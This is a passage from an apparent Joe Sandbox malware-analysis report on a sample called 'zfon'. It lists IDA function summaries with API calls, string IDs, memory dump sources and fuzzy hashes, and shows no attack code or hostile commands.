                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ??6?$basic_ostream@D@std@@@std@@U?$char_traits@V01@cef_string_map_alloc
                                                                                                • String ID: callback_id=$ name=$[CallJsFunctionInUiThread] calling ui thread $c:\projects\hydra\main\code\contrib\contrib\scene\src\source\cef\client_handler_impl.cpp
                                                                                                • API String ID: 3922544612-2379361043
                                                                                                • Opcode ID: 88080dbf10e0825f453430da8f9bb9d5dc949ec1d8c8c28ab456919ad5181f3d
                                                                                                • Instruction ID: 6298ff216ad643400b25738de4072053f8b2df707fbbac0755d2e37be1a832f8
                                                                                                • Opcode Fuzzy Hash: 88080dbf10e0825f453430da8f9bb9d5dc949ec1d8c8c28ab456919ad5181f3d
                                                                                                • Instruction Fuzzy Hash: BB41D332A18B8681DB50EF25E8401AAE371FBC4B94F948132EAAD033E9DF3DD505C790
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: setlocale$ExceptionThrowstd::invalid_argument::invalid_argument
                                                                                                • String ID: bad locale name
                                                                                                • API String ID: 1847144839-1405518554
                                                                                                • Opcode ID: 69bcb2bf6b235ff80315e2b808b356e45497ea8affdba11730961c61ec674efe
                                                                                                • Instruction ID: 9135fae39d3e112dc419976958447221c0ff4d0043918460e843394936279655
                                                                                                • Opcode Fuzzy Hash: 69bcb2bf6b235ff80315e2b808b356e45497ea8affdba11730961c61ec674efe
                                                                                                • Instruction Fuzzy Hash: 3121C961F1DAC2D5FE749F1D984427A6261EF84BC0F484031DB5D47B95EE2CEA868340
                                                                                                APIs
                                                                                                Strings
                                                                                                • SceneProxy/2.1.0 Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36, xrefs: 00007FF7F96E1076
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _onexitfreememcpymemmove
                                                                                                • String ID: SceneProxy/2.1.0 Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36
                                                                                                • API String ID: 3647039986-2186856816
                                                                                                • Opcode ID: 0d81267e62ba211395d2598232a8dfab2f01ed8b8c1adb052575867d0b14fb56
                                                                                                • Instruction ID: 0c948a91a088b6b0db3706385a123817643a155a2f4519581a9602adfa3c412d
                                                                                                • Opcode Fuzzy Hash: 0d81267e62ba211395d2598232a8dfab2f01ed8b8c1adb052575867d0b14fb56
                                                                                                • Instruction Fuzzy Hash: 7F317515D1DB8681E725EF69ED41274A371BFA8BD4F819231DD2D022EEDF2DA18483B0
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionThrowstd::ios_base::failure::failure
                                                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                • API String ID: 2003779279-1866435925
                                                                                                • Opcode ID: 76c8ab17d0850bfdcf0f794a817e6ee97031519e73788a0652dc125c2d8a2d96
                                                                                                • Instruction ID: 7eb30c6594e61acb986c3efa78fd980412751dc07071375f8d9e48158c1e5086
                                                                                                • Opcode Fuzzy Hash: 76c8ab17d0850bfdcf0f794a817e6ee97031519e73788a0652dc125c2d8a2d96
                                                                                                • Instruction Fuzzy Hash: 20018B62E18A8A96EE14CF0CD8415E92361EF90788FB84471D36E876A4EE3DE607C741
                                                                                                APIs
                                                                                                • strcspn.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8B90F2D92
                                                                                                • localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90F2DA5
                                                                                                • strcspn.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8B90F2DBA
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B90F3110
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B90F315B
                                                                                                  • Part of subcall function 00007FF8B90F80D8: memmove.VCRUNTIME140(?,?,?,?,00000000,00007FF8B90F5912), ref: 00007FF8B90F8130
                                                                                                  • Part of subcall function 00007FF8B90F80D8: memset.VCRUNTIME140(?,?,?,?,00000000,00007FF8B90F5912), ref: 00007FF8B90F813F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturnstrcspn$localeconvmemmovememset
                                                                                                • String ID:
                                                                                                • API String ID: 2282448879-0
                                                                                                • Opcode ID: 43ba8dbb3fa5cec9301f72fa23c6b9e93b59b68c625457b30bad576e0c72c2b3
                                                                                                • Instruction ID: 9a1fa9a1c81bb4af41afdc5979876f11096732bd13441fd8c3bae6418c5a4c97
                                                                                                • Opcode Fuzzy Hash: 43ba8dbb3fa5cec9301f72fa23c6b9e93b59b68c625457b30bad576e0c72c2b3
                                                                                                • Instruction Fuzzy Hash: 86E16722B18AC6D9EF019F6DC4542EC6771AB48BD8B544232DF5D17BA9DE3CE64AC300
                                                                                                APIs
                                                                                                  • Part of subcall function 00007FF7F96E2470: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F96E22DB), ref: 00007FF7F96E24CB
                                                                                                  • Part of subcall function 00007FF7F96E2470: memcpy.VCRUNTIME140(?,?,?,00007FF7F96E22DB), ref: 00007FF7F96E24E2
                                                                                                  • Part of subcall function 00007FF7F96E2470: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F96E22DB), ref: 00007FF7F96E24FA
                                                                                                  • Part of subcall function 00007FF7F9706E90: cef_string_map_alloc.LIBCEF ref: 00007FF7F9706E99
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E717E
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E718E
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E719E
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E71AB
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96E71E4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$cef_string_map_alloc$freemallocmemcpy
                                                                                                • String ID:
                                                                                                • API String ID: 224831930-0
                                                                                                • Opcode ID: f2e0434e812f486bbb2eabc96afd3d91da7e9aae555bade9a89ac74059c309bd
                                                                                                • Instruction ID: 440d90fa74a2a0492aa4cae09d76a251777b5bcc2227db6bdb2b251d52d61c7c
                                                                                                • Opcode Fuzzy Hash: f2e0434e812f486bbb2eabc96afd3d91da7e9aae555bade9a89ac74059c309bd
                                                                                                • Instruction Fuzzy Hash: 91917972B05B4185EB04EF69D8543ACA3B2FB84F99F858436CA2D037A8DF39D445C3A5
                                                                                                APIs
                                                                                                • memcmp.VCRUNTIME140 ref: 00007FF7F96F95AC
                                                                                                  • Part of subcall function 00007FF7F96E1FB0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F96E219C), ref: 00007FF7F96E1FD5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: mallocmemcmp
                                                                                                • String ID:
                                                                                                • API String ID: 2019052184-0
                                                                                                • Opcode ID: d3f66d2b6ad97b184e21337da213452f51ca896170bba51c97c27b9d314203c3
                                                                                                • Instruction ID: a851d11471a6bb2a9a01406f478943c9a4783d4b123fcf08d4ddfc382f53b3a7
                                                                                                • Opcode Fuzzy Hash: d3f66d2b6ad97b184e21337da213452f51ca896170bba51c97c27b9d314203c3
                                                                                                • Instruction Fuzzy Hash: 0F71C651608B9281E760BE229E002A997B2BB45BC8F884035DF7D877CDEF3DE4918391
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc$memset
                                                                                                • String ID:
                                                                                                • API String ID: 3154343008-0
                                                                                                • Opcode ID: dbac351c522733198ef531d23818992bc4ed6bb4c5475570b617ac3196796fe6
                                                                                                • Instruction ID: 70b68bf00c0dd6963c6d54ab4f6893e9f7a1022d3e65ea67e95a3756a7287223
                                                                                                • Opcode Fuzzy Hash: dbac351c522733198ef531d23818992bc4ed6bb4c5475570b617ac3196796fe6
                                                                                                • Instruction Fuzzy Hash: C0817B72608BC18AEB25DF24E8403EEB7B0FB84748F844129EB9D07AA9DF79D545C750
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: fgetwc
                                                                                                • String ID:
                                                                                                • API String ID: 2948136663-0
                                                                                                • Opcode ID: 7b092b86c2f800b45fcf13971108f149f52e97cd8681566c45f30ae54ea6449e
                                                                                                • Instruction ID: 5c60dcfed1fb245a678fda8319a3aa91679389c283d12a4a938782ff3e20dd5e
                                                                                                • Opcode Fuzzy Hash: 7b092b86c2f800b45fcf13971108f149f52e97cd8681566c45f30ae54ea6449e
                                                                                                • Instruction Fuzzy Hash: AA813972608A81D9EF508F29C4903AC33A5FB48BD8F515232EB5E47B99EF38D685D350
                                                                                                APIs
                                                                                                • new.LIBCMT ref: 00007FF7F96E946B
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96E9491
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96E94FF
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96E9532
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96E9560
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25C3
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25D3
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25E3
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25F0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturncef_string_map_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 2776152272-0
                                                                                                • Opcode ID: 1e3490bca68b8c3274cbeecc2115020831b9076bd9e81532a15e2d3a86fb5802
                                                                                                • Instruction ID: ea14ab52a017e56efc11d17fd89dfcb0153cfe4f5ae46667084028a3894cf2bf
                                                                                                • Opcode Fuzzy Hash: 1e3490bca68b8c3274cbeecc2115020831b9076bd9e81532a15e2d3a86fb5802
                                                                                                • Instruction Fuzzy Hash: 77618D62B04B4185FB00EFA1D8403ACA7B2AF44B98F998135DE2D17BD9CF39D845C3A4
                                                                                                APIs
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25C3
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25D3
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25E3
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25F0
                                                                                                • new.LIBCMT ref: 00007FF7F96E923F
                                                                                                  • Part of subcall function 00007FF7F97A3D44: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F97A3D70
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96E9266
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96E9302
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96E9336
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96E9364
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturncef_string_map_alloc$malloc
                                                                                                • String ID:
                                                                                                • API String ID: 1577610649-0
                                                                                                • Opcode ID: 6ace9081bd1f1edd449fb6e0773b42b66ffd3d33c4d8c5aa578f97e1b911971e
                                                                                                • Instruction ID: 0547ccf5f14cf60f49b76936b4203f2f616f7a6fa42d73d0c3e188d159650e79
                                                                                                • Opcode Fuzzy Hash: 6ace9081bd1f1edd449fb6e0773b42b66ffd3d33c4d8c5aa578f97e1b911971e
                                                                                                • Instruction Fuzzy Hash: B251A122B05B4188EB05AFA1D8402AD77B2BF44B98F994135DE2D17BD9CF39D845C390
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: freememcpy$mallocmemmove
                                                                                                • String ID:
                                                                                                • API String ID: 4020268379-0
                                                                                                • Opcode ID: 0a302a5f15a6ffb896fe3f1ed937148e5395896a0c9eb31bcb25d4cdad06a287
                                                                                                • Instruction ID: 1b867b08b18c25522a22012fef3fb25902b8724ce406b658cfe867004a5ed154
                                                                                                • Opcode Fuzzy Hash: 0a302a5f15a6ffb896fe3f1ed937148e5395896a0c9eb31bcb25d4cdad06a287
                                                                                                • Instruction Fuzzy Hash: 5741D062619B8185EB61AF02E84037AA7B1FB89BE0F451235EEAE077D8DF3DD0408351
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: freememcpy$mallocmemmove
                                                                                                • String ID:
                                                                                                • API String ID: 4020268379-0
                                                                                                • Opcode ID: 12b8396c82e345bc1688e98f6ccbff207033e9e2852a0f582d1375f5ce158e35
                                                                                                • Instruction ID: fb0ad63a0a6ea2b563ed47bb1edb450ed410effdd6f00e3b673615a02c7e9b39
                                                                                                • Opcode Fuzzy Hash: 12b8396c82e345bc1688e98f6ccbff207033e9e2852a0f582d1375f5ce158e35
                                                                                                • Instruction Fuzzy Hash: C3419122719B8181EB50AF12E84436AA371BB89BE0F551235EEAE07BD9DF3DD440C394
                                                                                                APIs
                                                                                                • memcpy.VCRUNTIME140(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,?,00007FF8B90F2A30,?,?,00000000,00007FF8B90F5826), ref: 00007FF8B90F25A5
